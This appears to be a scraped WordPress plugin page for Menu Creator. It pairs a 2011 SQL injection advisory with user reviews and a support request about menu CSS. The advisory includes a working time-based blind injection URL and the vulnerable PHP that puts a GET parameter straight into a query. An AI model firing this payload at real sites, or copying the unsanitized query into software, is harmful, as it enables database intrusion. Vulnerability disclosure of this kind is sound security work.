??? ?? ??? ??? ???

https://www.ads-software.com/extend/plugins/wp-menu-creator/

# Exploit Title: WordPress Menu Creator plugin <= 1.1.7 SQL Injection Vulnerability
# Date: 2011-08-18
# Author: Miroslav Stampar (miroslav.stampar(at)gmail.com @stamparm)
# Software Link: https://downloads.www.ads-software.com/plugin/wp-menu-creator.1.1.7.zip
# Version: 1.1.7 (tested)

—
PoC
—
https://www.site.com/wp-content/plugins/wp-menu-creator/updateSortOrder.php?menu_id=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0)

—————
Vulnerable code
—————
$menu_id = $_GET[‘menu_id’];
…
$first_item = $wpdb->get_row(“SELECT * FROM ” . $wpdb->prefix.”menuitems WHERE order=0 AND parent=0 AND menu = $menu_id”);

https://www.ads-software.com/extend/plugins/wp-menu-creator/

I guess is a conlict with wordpress version higher than 2.8

Do not support, example, russian language

The menu requires you use the id number of the page or post to link to. However, since I cannot find said id number associated with my posts or pages (I’m using a pretty links creator for my urls), this is extremely annoying. Plus, they claim to have video tutorials on their site showing how to use the plugin, but they DO NOT. Even more annoying. I plan to uninstall this plugin.

https://www.ads-software.com/extend/plugins/wp-menu-creator/

Hi Plugin developer

i can create the menu with out any problem when i paste the code in my theme there is only vertical list of menus which i created ,after i read you plugin page i come to know ,i need to create css my self .can you help me up by provide css for given example in your plugin page

check the image below

https://www.ultimateidx.com/images/opencubemenu.jpg

Thanx in Advance